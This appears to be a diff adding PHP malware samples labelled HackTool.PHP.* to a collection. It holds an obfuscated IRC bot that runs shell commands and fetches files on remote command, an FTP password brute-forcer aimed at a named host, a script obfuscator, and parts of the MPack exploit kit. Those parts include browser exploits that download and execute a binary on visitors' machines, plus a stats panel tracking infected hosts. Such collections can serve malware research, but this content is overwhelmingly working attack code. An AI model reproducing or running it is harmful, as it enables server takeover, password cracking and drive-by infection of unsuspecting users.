} break; case l69923efad5b7a("tJyl"): if (count($zdfff0a7fa1a55) > 1) { eval(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
} break; case l69923efad5b7a("q5mp"): if (count($zdfff0a7fa1a55) > 2) { if (!($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[2],"w"))) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
} else { if (!($eb5eda0a74558a = file($zdfff0a7fa1a55[1]))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
} else { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < count($eb5eda0a74558a); $i865c0c0b4ab0e++) { fwrite($k0666f0acdeed3,$eb5eda0a74558a[$i865c0c0b4ab0e]);
} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8=") . " \2".$zdfff0a7fa1a55[1]."\2 downloaded to \2".$zdfff0a7fa1a55[2]."\2");
} fclose($k0666f0acdeed3); } } break; case l69923efad5b7a("sp0="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
break; case l69923efad5b7a("t50="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3lzaW5mby8v") . " [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
break; case l69923efad5b7a("tKOnpqKUmuw="): if (isset($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) { if (fsockopen($zdfff0a7fa1a55[1],(int)$zdfff0a7fa1a55[2],$t56bd7107802eb,$m341be97d9aff9,5)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Open\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Closed\2");
} } break; case l69923efad5b7a("uaKWn5g="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VW5hbWUvLw==")." " .php_uname());
break; case l69923efad5b7a("rZg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("SUQvLw==")." ".getmypid());
break; case l69923efad5b7a("p6GZ"): if (count($zdfff0a7fa1a55)>1) { $p1dccadfed7bcb = popen(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])),"r");
while (!feof($p1dccadfed7bcb)) { $k734515cbd3636 = trim(fgets($p1dccadfed7bcb,512)); if (strlen($k734515cbd3636)>0) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> ".$k734515cbd3636); sleep(1); }
} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("PiBbRU9GXQ=="));
} break; case l69923efad5b7a("qayalaiYmg=="): h54d54a126a783(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
break; } } else { switch(substr($zdfff0a7fa1a55[0],1)) { case l69923efad5b7a("bg=="): if (isset($zdfff0a7fa1a55[1]) && md5($zdfff0a7fa1a55[1]) == jf9feaa9bcab30($aec12e0af93cb5['pa']) && preg_match(jf9feaa9bcab30($aec12e0af93cb5['ha']),$m67b3dba8bc677)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UmVhZHkvLyBPaw=="));
$see11cbb19052e[$m67b3dba8bc677] = TRUE; } else { df2f4e964f79d0($j351a1d2ad68bc, FALSE, jf9feaa9bcab30($aec12e0af93cb5['ch']), ob5d21085bf2c0("UmVhZHkvLyByZWplY3RlZA=="));
} break; } } } } $td707b8140a662 = $f7fabc1404929c; } fclose($j351a1d2ad68bc); sleep(3); rfc35fdc70d5fc();
} else { shuffle($b59b514174bffe); rfc35fdc70d5fc(); } } function q56eacb300613d($s317d37b0edc7b, $n78e731027d8fd) {
fwrite($s317d37b0edc7b,"$n78e731027d8fd\r\n"); } function df2f4e964f79d0($s317d37b0edc7b, $d73be252ca8221, $e01b6e20344b68, $n78e731027d8fd) {
if($d73be252ca8221 != TRUE) { q56eacb300613d($s317d37b0edc7b, ob5d21085bf2c0("UFJJVk1TRw==")." $e01b6e20344b68 :$n78e731027d8fd");
} } function l69923efad5b7a($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba);
for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e<strlen($yc7a1ddb19daba); $i865c0c0b4ab0e++) { $ra87deb01c5f53 = substr($yc7a1ddb19daba, $i865c0c0b4ab0e, 1);
$xae0e1268c3859 = substr(ob5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="), ($i865c0c0b4ab0e % strlen(ob5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q=")))-1, 1);
$ra87deb01c5f53 = chr(ord($ra87deb01c5f53)-ord($xae0e1268c3859)); $lb4a88417b3d01.=$ra87deb01c5f53;
} return $lb4a88417b3d01; } function ad988971435842($wfac65290966c7) { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < $wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); if (posix_getegid() == 0) $t2cb9df9898e55 = "r-".$t2cb9df9898e55;
return $t2cb9df9898e55; } function h54d54a126a783($n111ca5df4a68b) { $y9b207167e5381 = ''; if (!empty($n111ca5df4a68b))
{ if(function_exists('exec')) { @exec($n111ca5df4a68b,$y9b207167e5381); $y9b207167e5381 = join("\n",$y9b207167e5381);
} elseif(function_exists('shell_exec')) { $y9b207167e5381 = @shell_exec($n111ca5df4a68b); } elseif(function_exists('system'))
{ @ob_start(); @system($n111ca5df4a68b); $y9b207167e5381 = @ob_get_contents(); @ob_end_clean(); }
elseif(function_exists('passthru')) { @ob_start(); @passthru($n111ca5df4a68b); $y9b207167e5381 = @ob_get_contents();
@ob_end_clean(); } elseif(@is_resource($k8fa14cdd754f9 = @popen($n111ca5df4a68b,"r"))) { $y9b207167e5381 = "";
while(!@feof($k8fa14cdd754f9)) { $y9b207167e5381 .= @fread($k8fa14cdd754f9,1024); } @pclose($k8fa14cdd754f9);
} } return $y9b207167e5381; } function jf9feaa9bcab30($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba);
for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e<strlen($yc7a1ddb19daba); $i865c0c0b4ab0e++) { $ra87deb01c5f53 = substr($yc7a1ddb19daba, $i865c0c0b4ab0e, 1);
$xae0e1268c3859 = substr(ob5d21085bf2c0("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="), ($i865c0c0b4ab0e % strlen(ob5d21085bf2c0("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU=")))-1, 1);
$ra87deb01c5f53 = chr(ord($ra87deb01c5f53)-ord($xae0e1268c3859)); $lb4a88417b3d01.=$ra87deb01c5f53;
} return $lb4a88417b3d01; } function gfb0daa8f01135($wfac65290966c7) { $t2cb9df9898e55 = ""; for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<$wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); return $t2cb9df9898e55; } rfc35fdc70d5fc(); ?>

81
PHP/HackTool.PHP.Brute.a Normal file
View File

@ -0,0 +1,81 @@
<?php
/*
* This simple FTp brute forcer script is coded by
* ^cybergang007^. I am in no way responsible for
* any serious job you do with this piece of code.
* Intended for educational purposes only.
*
* This bad script probes an FTP dictionary attack
*
* @Email : <soteres2002@greeknetizen.net>
* @URL : http://www.greeknetizen.net/
* @DESCTIPTION:
* This PHP script tries a password
* from the password file each time intil it finds it.
* Execute it from a webpage on your server, not from
* the command line(!). And remember to clear your
* traces if you succeed in cracking the password
* of the FTP account you desire. And once again,
* I am not responsible for any of your actions
* with this code.
*/
error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES
set_time_limit(0); // set the time limit for the script to +oo
$passwordfile = "passwd.dic"; //this is the path to the passwordfile
$targethost = "www.bahoosh.net"; //change this to the host you want to attack
$usrname = "bahoosh"; // change this to the username
// of the FTP account you want
// to attack
$interval = 1; // this is the break the script each time it tries a password
// do not set this to zero
//change the second arguments you desire
$crh = "Sorry, the host you specified cannot be retrieved!";
$cc = "<font color=\"red\">Sorry, I cannot connect to $targethost with <b>$username</b> and password: $trypassword</font><br>";
/* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */
if(!file_exists($passwordfile)) {
die("Sorry, the passwordfile <b>$passwordfile</b> cannot be retrieved");
} else {
// open connection funtion
function openconnection($targethost,$username,$trypassword) {
print "<hr>Trying password <b>$trypassword</b> for <b>".$username."</b> to $targethost<hr><br>";
$ftp_conn = @ftp_connect($targethost) or print $crh;
if($ftp_conn) {
$trylogin = @ftp_login($ftp_conn,$username,$trypassword);
if(!$trylogin) {
print $cc;
} else {
print "<b><font color=\"red\">The password is: $trypassword</font></b><br>";
@ftp_quit($ftp_conn);
break;
}
}
}
//end of function
// try to open the password file
$fp = @fopen($passwordfile,"r");
if(!$fp) {
die("The password file cannot open");
} else {
print "<b>The passwordfile is forked!</b>";
//get the passwords
while($trypassword = @fgets($fp,1024)) {
openconnection($targethost,$usrname,$trypassword);
sleep($interval);
}
}
//...and close the password file or die of errors
@fclose($fp) or die("\n<br>\nCannot close the password file!\n");
echo "<b>The password file has closed";
}
// when you succeed connecting to your victim's server
// do not forget to delete your traces
?>

2026
PHP/HackTool.PHP.Haxplorer.c Normal file
View File

File diff suppressed because it is too large Load Diff

52
PHP/HackTool.PHP.Iframer.a Normal file
View File

@ -0,0 +1,52 @@
<?
function get_rnd_var() {return 'v'.uniqid('');}
function get_value($v, &$codebuf)
{
$var1 = get_rnd_var();
$var2 = get_rnd_var();
$vars = array(
"$v",
$var1,
$var1.'()',
$var1.'()',
);
$bufs = array(
"",
"var $var1=$v;",
"function $var1 () {return $v;}",
"function $var1 () {var $var2=$v; return $var2;}",
);
$item = rand(0, count($vars)-1);
$codebuf .= $bufs[$item];
return $vars[$item];
}
function encode_scuko ($q)
{
$r='';
for($i=0;$i<strlen($q);$i++)
{
$hex=dechex(ord($q[$i]));
if (strlen($hex)==1) $hex = '0'.$hex;
$r .= $hex;
}
$r=strtoupper($r);
$hex2dec=get_rnd_var();
$hex=get_rnd_var();
$codebuf1 = '';
$value16 = get_value(16, $codebuf1);
$c="function $hex2dec($hex){ $codebuf1 return(parseInt($hex,$value16));}";
$deco=get_rnd_var();
$t=get_rnd_var();
$s=get_rnd_var();
$i=get_rnd_var();
$codebuf2 = '';
$value2 = get_value(2, $codebuf2);
$c.="function $deco($t){ $codebuf2 var $s='';for($i=0; $i<$t.length; $i+=$value2){ $s+=(String.fromCharCode($hex2dec($t.substr($i, $value2))));}return $s;}";
$r="document.write($deco('$r'));";
return "<script>$c $r</script>";
}
?>

229
PHP/HackTool.PHP.Mphak.b Normal file
View File

@ -0,0 +1,229 @@
<?
//MPack admin module
//(c) 2006, 2007 DreamCoders Team
define("MAIN_MODULE", TRUE);
include('settings.php');
include('logincheck.php');
?>
<html>
<head>
<title>MPack</title>
<style>
<!--
.stext { font-family:Tahoma; font-size:8pt; color:white; text-align:right; }
.heading { font-family:Arial; font-weight:400; font-size:18pt; color:rgb(255,153,0); letter-spacing:90%; }
.tbldata { font-family:Tahoma; font-weight:bold; font-size:13; color:rgb(204,204,204); }
.tblhead { font-family:Verdana; font-weight:bold; font-size:9pt; color:white; }
.sstext { font-family:Tahoma; font-size:8pt; color:rgb(204,204,204); }
.css0 { font-family:Tahoma; font-size:8pt; color:rgb(255,153,0); }
-->
</style>
</head>
<body bgcolor="black" text="white" link="blue" vlink="purple" alink="red">
<p class="heading" align="right"> </p>
<table width="100%" cellpadding="0" cellspacing="0">
<tr>
<td width="70%" align="left" valign="top">
<p class="css0">Server time/date snapshot:&nbsp;<? echo(date("n-M-Y H:i:s")); ?><br>
<? $cci=GetCountryInfo(getenv("REMOTE_ADDR"));
echo(getenv("REMOTE_ADDR")." (".$cci['name'].")"); ?></p>
</td>
<td width="30%" align="right" valign="bottom">
<p class="heading">MPack v0.90 stats</p>
</td>
</tr>
</table>
<hr>
<table border="0" width="100%">
<tr>
<td width="50%">
<table width="350" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="100%" colspan="2" align="center" valign="middle" class="tblhead" bgcolor="#2C55B1" bordercolor="#2C55B1">
Attacked hosts (total - uniq)</td>
</tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>IE XP ALL</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("0day")." - ".GetUniq("0day") ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>QuickTime</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("qtlexp")." - ".GetUniq("qtlexp") ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Win2000</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("jar")." - ".GetUniq("jar") ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Firefox</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("firefox")." - ".GetUniq("firefox") ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Opera7</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("opera7")." - ".GetUniq("opera7") ?></td></tr>
</table>
</td>
<td width="50%">
<table width="350" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="100%" colspan="2" align="center" valign="middle" class="tblhead" bgcolor="#2C55B1" bordercolor="#2C55B1">
<SPAN class=header>Traffic (total - uniq)</SPAN></td>
</tr>
<?
//calculate traff stats
$tt=GetTotal("all");
$tu=GetUniq("all");
$ft=GetTotal("file");
$fu=GetUniq("file");
$et=GetTotal("expl");
$eu=GetUniq("expl");
?>
<tr><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><p>Total traff</p></td><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><? echo $tt." - ".$tu ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><p>Exploited</p></td><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><? echo $ft." - ".$fu ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><p>Loads count</p></td><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><? echo $et." - ".$eu ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><p>Loader's response</p></td><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><? echo @round( ((($et/$ft))*100),2)."% - ".@round( ((($eu/$fu)*100)),2)."%" ?></td></tr>
<tr>
<td width="352" bordercolor="#2C55B1" colspan="2" bgcolor="#2C55B1" class="tblhead">
<p align="center"><SPAN class=header>Efficiency <? echo @round( (($et/$tt)*100),2)."% - ".@round( (($eu/$tu)*100),2)."%" ?></SPAN></p>
</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<table border="0" width="100%" align="center">
<tr>
<td width="50%" align="center" valign="top">
<table width="350" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="100%" colspan="2" align="center" valign="middle" bgcolor="#2C55B1" class="tblhead" bordercolor="#2C55B1">
Browser stats (total)</td>
</tr>
<? //refs stats
$query = "SELECT * FROM ".$dbstats."_brs ORDER BY count DESC";
$r = mysql_query($query);
while ($array = @mysql_fetch_array($r))
{
$count = $array['count'];
$ref = $array['browser'];
if ($ref=="_") { $ref="_Unknows"; }
?> <tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p><? echo $ref; ?></p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo $count."<br><font color=gray>".@round(($count/$tt)*100, 1)."%</font>"; ?></td></tr>
<?
}
?>
</table>
</td>
<td width="50%" align="center" valign="top">
<table width="350" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="100%" colspan="2" align="center" valign="middle" bgcolor="#2C55B1" class="tblhead" bordercolor="#2C55B1">
Modules state</td>
</tr>
<? //modules stats prepare
if ($UseMySQL==1) {$SB="MySQL-based";} else {$SB="Textfile-based";};
if ($BlockDuplicates==1) {$UB="<font color=#00ff00>ON</text>";} else {$UB="<font color=red>OFF</text>";};
if ($OnlyDefiniedCoutries==1) {$CB="<font color=green>all except <br>".$CoutryList."</text>";} else { $CB="<font color=green>OFF</text>"; }
?>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Statistic type</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo $SB; ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>User blocking</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo $UB; ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Country blocking</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo $CB; ?></td></tr>
</table>
</td>
</tr>
</table>
<? //country\refs stats only with mysql
if ($UseMySQL==1) { ?>
<hr>
<table border="0" width="100%">
<tr>
<td width="100%">
<table width="500" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="45%" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead">
Country</td>
<td width="16%" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead">Traff</td>
<td width="17%" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead">Loads</td>
<td width="17%" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead">
<p>Efficiency</p>
</td>
</tr>
<? //make country stats
function HTMLShowFlag($a2){return '<img src="./flags/drm_'.strtolower($a2).'.gif" width=18 height=12>';}
$query = "SELECT * FROM ".$dbstats." WHERE statid = 'traff' ORDER BY count DESC";
$r = mysql_query($query);
while ($array = @mysql_fetch_array($r))
{ ?>
<tr>
<td width="45%" bordercolor="#2C55B1" align="left" valign="middle" class="tblhead">
<p>&nbsp;<? echo HTMLShowFlag($array['a2'])." ".$array['a2']." - ".ucfirst(strtolower($array['country'])); ?></p>
</td>
<td width="16%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><? echo $array['count']."<br><font color=gray>".@round(($array['count']/$tt)*100, 1)."%</font>"; ?></td>
<?
//check loads
$query2 = "SELECT * FROM ".$dbstats." WHERE statid = 'load' AND a2 = '".$array['a2']."'";
$r2 = mysql_query($query2);
$array2 = @mysql_fetch_array($r2);
if ($array2['count'] > 0) { $loads = $array2['count']; } else { $loads = 0; }
?>
<td width="17%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><? echo $loads."<br><font color=gray>".@round(($loads/$et)*100, 1)."%</font>"; ?></td>
<td width="17%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><? echo @round( (($loads/$array['count'])*100),2)."%"; ?></td>
</tr>
<? } ?>
</table>
</td>
</tr>
</table>
<hr>
<table border="0" width="100%">
<tr>
<td width="100%" align="center" valign="top">
<table width="500" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="494" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead" colspan="2">
<p>Referer stats (&gt;<? echo $MinRefs; ?>)</p>
</td>
</tr>
<? //refs stats
$query = "SELECT * FROM ".$dbstats."_refs ORDER BY count DESC";
$r = mysql_query($query);
$NumRefs=0;
while ($array = @mysql_fetch_array($r))
{
$count = $array['count'];
$ref = $array['referer'];
if ($ref=="_") { $ref="_No referer"; }
if ($count>$MinRefs) { ?> <tr><td width="79%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><p><? echo $ref; ?></p></td><td width="19%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><? echo $count."<br><font color=gray>".@round(($count/$tt)*100, 1)."%</font>"; ?></td></tr> <? }
$NumRefs+=1;
}
?>
</table>
</td>
</tr>
</table>
<? } ?>
<hr>
<span class="stext" align="right">(c) 2007 DreamCoders<br>
MPack software is created solely for test purposes. You are prohibited to use it in conditions violating local or international laws. Authors hold no responsibility for any damage, direct or indirect, caused by usage of this software&nbsp;<br></span>
</body>
</html>

65
PHP/HackTool.PHP.Mphak.c Normal file
View File

@ -0,0 +1,65 @@
<?
$url = "http://".$_SERVER["HTTP_HOST"].str_replace ("\\", "/", dirname ($_SERVER["PHP_SELF"]))."/load.php";
function encode ($content) {
$str = trim (strip_tags ($content));
$new = "";
for ($i = 0; $i < strlen ($str); $i ++) $new .= chr (ord ($str[$i]) ^ 1);
return '<script language=JavaScript>str = "'.$new.'";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script>';
}
if ($java == true) echo '<applet archive="java.php" code="BaaaaBaa.class" width=1 height=1><param name="url" value="'.$url.'"></applet>';
elseif ($browser == "MSIE") echo '<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404">'.encode ('<script language="JavaScript">
start();
function start() {
var zad = document.createElement(\'object\');
zad.setAttribute(\'id\',\'zad\');
zad.setAttribute(\'classid\',\'cl\'+\'si\'+"d:BD"+"96C5"+\'56-65A3-1\'+"1D0-98"+\'3A-00\'+"C04"+\'FC2\'+"9E"+\'36\');
try {
var q = zad.CreateObject(\'ms\'+"xm"+\'l2\'+"."+\'XM\'+"LH"+\'T\'+\'TP\',\'\');
var s = zad.CreateObject("Shel"+"l.Ap"+"pl"+"icati"+"on",\'\');
var t = zad.CreateObject(\'ad\'+\'od\'+"b."+\'st\'+"re"+\'am\',\'\');
try { t.type = 1;
q.open(\'G\'+"E"+\'T\',\''.$url.'\',false);
q.send(); t.open();
t.Write(q.responseBody);
var name = \'.//..//iexplorer.exe\';
t.SaveToFile(name,2);
t.Close();
} catch(e) {}
try { s.shellexecute(name); } catch(e) {}}
catch(e){}}
</script>')."</head></html>";
elseif ($browser == "Opera") echo encode ('<script language="JavaScript">
blank_iframe = document.createElement(\'iframe\');
blank_iframe.src = \'about:blank\';
blank_iframe.setAttribute(\'id\', \'blank_iframe_window\');
blank_iframe.setAttribute(\'style\', \'display:none\');
document.appendChild(blank_iframe);
blank_iframe_window.eval ("config_iframe = document.createElement(\'iframe\');\
config_iframe.setAttribute(\'id\', \'config_iframe_window\');\
config_iframe.src = \'opera:config\';\
document.appendChild(config_iframe);\
app_iframe = document.createElement(\'script\');\
cache_iframe = document.createElement(\'iframe\');\
app_iframe.src = \'<?php echo $url; ?>\';\
app_iframe.onload = function ()\
{\
cache_iframe.src = \'opera:cache\';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp(\'(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"\'+app_iframe.src.toUpperCase(), \'\');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference(\'Network\',\'TN3270 App\',opera.getPreference(\'User Prefs\',\'Cache Directory4\')+parent.filename[1]);\
app_link = document.createElement(\'a\');\
app_link.setAttribute(\'href\', \'tn3270://nothing\');\
app_link.click();\
setTimeout(function () {opera.setPreference(\'Network\',\'TN3270 App\',\'telnet.exe\')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>');
?>

236
PHP/HackTool.PHP.Mphak.e Normal file
View File

@ -0,0 +1,236 @@
<?
// MPack main script
// .CONFIG
include ('settings.php'); //global settings
// .CODE
include ('cryptor.php'); //crypting module
function detect_browser($HTTP_USER_AGENT) {
// Áðàóçåð è åãî âåðñèÿ
if (eregi("(opera) ([0-9]{1,2}.[0-9]{1,3}){0,1}", $HTTP_USER_AGENT, $match) || eregi("(opera/)([0-9]{1,2}.[0-9]{1,3}){0,1}", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Opera";
$browser[version] = $match[2];
}
elseif (eregi("(konqueror)/([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Konqueror";
$browser[version] = $match[2];
}
elseif (eregi("(lynx)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Lynx";
$browser[version] = $match[2];
}
elseif (eregi("(links) \(([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Links";
$browser[version] = $match[2];
}
elseif (eregi("(msie) ([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "MSIE";
$browser[version] = $match[2];
}
elseif (eregi("(netscape6)/(6.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Netscape";
$browser[version] = $match[2];
}
elseif (eregi("(mozilla)/([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Netscape(mozilla)";
$browser[version] = $match[2];
if (eregi("(firefox)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Firefox";
$browser[version] = $match[2];}
}
else {
$browser[name] = "Unknown";
$browser[version] = "Unknown";
}
// OS
if (eregi("linux", $HTTP_USER_AGENT)) $browser[os] = "Linux";
elseif (eregi("win32", $HTTP_USER_AGENT)) $browser[os] = "Windows";
elseif ((eregi("(win)([0-9]{2})", $HTTP_USER_AGENT, $match)) || (eregi("(windows) ([0-9]{2})", $HTTP_USER_AGENT, $match))) $browser[os] = "Windows ".$match[2];
elseif (eregi("(winnt)([0-9]{1,2}.[0-9]{1,2}){0,1}", $HTTP_USER_AGENT, $match)) $browser[os] = "Windows NT ".$match[2];
elseif (eregi("(windows nt)( ){0,1}([0-9]{1,2}.[0-9]{1,2}){0,1}", $HTTP_USER_AGENT, $match)) $browser[os] = "Windows NT ".$match[3];
elseif (eregi("mac", $HTTP_USER_AGENT)) $browser[os] = "Macintosh";
elseif (eregi("freebsd", $HTTP_USER_AGENT)) $browser[os] = "FreeBSD";
else $browser[os] = "Unknown";
if (eregi("(sv1)", $HTTP_USER_AGENT)) $browser[os] = "Windows NT 5.1 SP2";
return $browser;
}
function uEncode($s) //encodes url into shellcode
{
$res=strtoupper(bin2hex($s));
$g = round(strlen($res)/4);
if ($g != (strlen($res)/4)) { $res.="00"; }
$out = "";
for ($i=0; $i<strlen($res); $i+=4) {
$out.="%u".substr($res, $i+2, 2).substr($res, $i, 2);
}
return $out;
}
//checks current country with a list
//terminate if not in the list
function CheckCountry()
{
global $CoutryList;
$cci=GetCountryInfo(getenv("REMOTE_ADDR"));
if (strpos(strtoupper($CoutryList), $cci['a2'])==FALSE) {
//coutry not in the list
echo "^_^";
exit;
